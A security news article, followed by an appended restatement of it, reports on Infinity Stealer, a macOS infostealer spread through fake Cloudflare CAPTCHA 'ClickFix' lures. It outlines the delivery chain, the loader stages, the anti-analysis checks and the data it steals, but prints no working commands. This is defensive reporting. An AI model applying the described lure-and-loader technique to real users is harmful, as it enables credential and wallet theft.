New Infinity Stealer malware grabs macOS data via ClickFix lures

News

Featured
Latest

Popular LiteLLM PyPI package backdoored to steal credentials, auth tokens

HackerOne discloses employee data breach after Navia hack

Firefox now has a free built-in VPN with 50GB monthly data limit

Infinite Campus warns of breach after ShinyHunters claims data theft

New Infinity Stealer malware grabs macOS data via ClickFix lures

Learn 71 languages in one science-backed app while it’s on sale

Backdoored Telnyx PyPI package pushes malware hidden in WAV audio

Fake VS Code alerts on GitHub spread malware to developers

Tutorials

Latest
Popular

How to access the Dark Web using the Tor Browser

How to enable Kernel-mode Hardware-enforced Stack Protection in Windows 11

How to use the Windows Registry Editor

How to backup and restore the Windows Registry

How to start Windows in Safe Mode

How to remove a Trojan, Virus, Worm, or other Malware

How to show hidden files in Windows 7

How to see hidden files in Windows

Webinars
Downloads

Latest
Most Downloaded

Qualys BrowserCheck

STOPDecrypter

AuroraDecrypter

FilesLockerDecrypter

AdwCleaner

ComboFix

RKill

Junkware Removal Tool

Deals

Categories

eLearning

IT Certification Courses

Gear + Gadgets

Security

VPNs

Popular

Best VPNs

How to change IP address

Access the dark web safely

Best VPN for YouTube

Forums
More

Virus Removal Guides
Startup Database
Uninstall Database
Glossary
Send us a Tip!
Welcome Guide

HomeNewsSecurityNew Infinity Stealer malware grabs macOS data via ClickFix lures

New Infinity Stealer malware grabs macOS data via ClickFix lures

By Bill Toulas

March 28, 2026
10:35 AM
0

A new info-stealing malware named Infinity Stealer is targeting macOS systems with a Python payload packaged as an executable using the open-source Nuitka compiler.
The attack uses the ClickFix technique, presenting a fake CAPTCHA that mimics Cloudflare’s human verification check to trick users into executing malicious code.
Researchers at Malwarebytes say this is the first documented macOS campaign combining ClickFix delivery with a Python-based infostealer compiled using Nuitka.
Because Nuitka produces a native binary by compiling the Python script into C code, the resulting executable is more resistant to static analysis.
Compared to PyInstaller, which bundles Python with bytecode, it’s more evasive because it produces a real native binary with no obvious bytecode layer, making reverse engineering much harder.
“The final payload is written in Python and compiled with Nuitka, producing a native macOS binary. That makes it harder to analyze and detect than typical Python-based malware,” Malwarebystes says.
Attack chain
The attack begins with a ClickFix lure on the domain update-check[.]com, posing as a human verification step from Cloudflare and asking the user to complete the challenge by pasting a base64-obfuscated curl command into the macOS Terminal, bypassing OS-level defenses.

ClickFix step used in Infinity attacksSource: Malwarebytes
The command decodes a Bash script that writes the stage-2 (Nuitka loader) to /tmp, then removes the quarantine flag, and executes it via ‘nohup.’ Finally, it passes the command-and-control (C2) and token via environment variables and then deletes itself and closes the Terminal window.
The Nuitka loader is an 8.6 MB Mach-O binary that contains a 35MB zstd-compressed archive, containing the stage-3 (UpdateHelper.bin), which is the Infinity Stealer malware.

The malware's disassembly viewSource: Malwarebytes
Before starting to collect sensitive data, the malware performs anti-analysis checks to determine whether it is running in a virtualized/sandboxed environment.
Malwarebytes’ analysis of the Python 3.11 payload uncovered that the info-stealer can take screenshots and harvest the following data:
Credentials from Chromium‑based browsers and Firefox
macOS Keychain entries
Cryptocurrency wallets
Plaintext secrets in developer files, such as .env
All stolen data is exfiltrated via HTTP POST requests to the C2, and a Telegram notification is sent to the threat actors upon completion of the operation.
Malwarebytes underlines that the appearance of malware like Infinity Stealer is proof that threats to macOS users are only getting more advanced and targeted.
Users should never paste into Terminal commands they find online and don’t fully understand.

Automated Pentesting Covers Only 1 of 6 Surfaces.
Automated pentesting proves the path exists. BAS proves whether your controls stop it. Most teams run one without the other.This whitepaper maps six validation surfaces, shows where coverage ends, and provides practitioners with three diagnostic questions for any tool evaluation.
Get Your Copy Now

Related Articles:
New GlassWorm attack targets macOS via compromised OpenVSX extensionsSuspected RedLine infostealer malware admin extradited to USNew Torg Grabber infostealer malware targets 728 crypto walletsFake enterprise VPN sites used to steal company credentialsFake Claude Code install guides push infostealers in InstallFix attacks

ClickFix
Infinity Stealer
Info Stealer
Information Stealer
macOS
Malware
Nuitka
Python

Bill Toulas
Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.

Previous Article

Post a Comment Community Rules

You need to login in order to post a comment
Not a member yet? Register Now

You may also like:

Popular Stories

Kali Linux 2026.1 released with 8 new tools, new BackTrack mode

European Commission investigating breach after Amazon cloud account hack

TP-Link warns users to patch critical router auth bypass flaw

Sponsor Posts

Overdue a password health-check? Audit your Active Directory for free

Is your program ready for agentic GRC? See what shift enterprise teams need to make.

Synthetic Identities, Proxies & Real Identities for Sale, is yours next?

Are your AI accounts being sold on the dark web? Check for free. 

AI is a data-breach time bomb: Read the new report

  Upcoming Webinar

Follow us:

Main Sections

News
Webinars
VPN Buyer Guides
SysAdmin Software Guides
Downloads
Virus Removal Guides
Tutorials
Startup Database
Uninstall Database
Glossary

Community

Forums
Forum Rules
Chat

Useful Resources

Welcome Guide
Sitemap

Company

About BleepingComputer
Contact Us
Send us a Tip!
Advertising
Write for BleepingComputer
Social & Feeds
Changelog

Terms of Use - Privacy Policy - Ethics Statement - Affiliate Disclosure

Copyright @ 2003 - 2026 Bleeping Computer® LLC - All Rights Reserved

Login

Username

Password

Remember Me

Sign in anonymously

Sign in with Twitter

Not a member yet? Register Now

Reporter

Help us understand the problem. What is going on with this comment?

Spam

Abusive or Harmful

Inappropriate content

Strong language

Other

Read our posting guidelinese to learn what content is prohibited.

Submitting...
SUBMIT

New Infinity Stealer malware represents a significant escalation in macOS threat landscape, utilizing a sophisticated attack chain centered around the ClickFix technique and compiled with the Nuitka compiler. According to Malwarebytes’ research, this is the first documented instance of combining ClickFix delivery with a Python-based infostealer compiled with Nuitka, presenting a novel approach to macOS malware. The attack highlights the evolving tactics employed by threat actors to evade traditional security measures.

The core of the attack begins with a deceptive lure presented via the update-check.com domain, mimicking a Cloudflare CAPTCHA challenge, prompting the user to input a base64-obfuscated curl command into the macOS Terminal. This command initiates a sequence of actions designed to execute the subsequent stages of the malware. First, the command decodes a Bash script that writes the stage-2 Nuitka loader to the /tmp directory, removes the quarantine flag, and then executes it using 'nohup,' ensuring it continues running even if the Terminal window is closed. Finally, the script transfers the command and control (C2) server address and token through environment variables, followed by deleting itself and closing the Terminal window.

The stage-2 component is an 8.6 MB Mach-O binary, utilizing Nuitka to compile the Python script into a native executable, rendering static analysis considerably more difficult. This binary contains a 35MB zstd-compressed archive, which unpacks the stage-3 component, identified as UpdateHelper.bin, functioning as the primary Infinity Stealer malware itself. A critical step within this malware is an anti-analysis check; the malware checks the environment for virtualization or sandboxing, adapting its behavior accordingly.

Once operational, the Infinity Stealer payload, written in Python 3.11, initiated a data harvesting campaign. This campaign targeted widespread data theft, including screenshots, macOS Keychain entries, cryptocurrency wallets, and plaintext secrets stored within developer files like .env files. The malware’s exfiltration process utilized HTTP POST requests directed to the C2 server, simultaneously transmitting a Telegram notification to the actors upon successful data collection. This multi-layered approach—immediate notification and data transit—demonstrates a timely response characteristic of advanced attackers.

Malwarebytes’ analysis underscores the increasing sophistication of threats against macOS users. The use of Nuitka and the ClickFix technique demonstrates a commitment to covert malware development, making detection considerably more challenging for conventional security tools. This malware highlights the need for users to exercise extreme caution when interacting with unknown commands or links, particularly those delivered via seemingly legitimate verification mechanisms.

The attack signifies a heightened level of threat intelligence targeting macOS systems, suggesting a more targeted and persistent approach by the attacker group. Users should prioritize awareness and implement best practices to prevent falling victim to such sophisticated malware campaigns.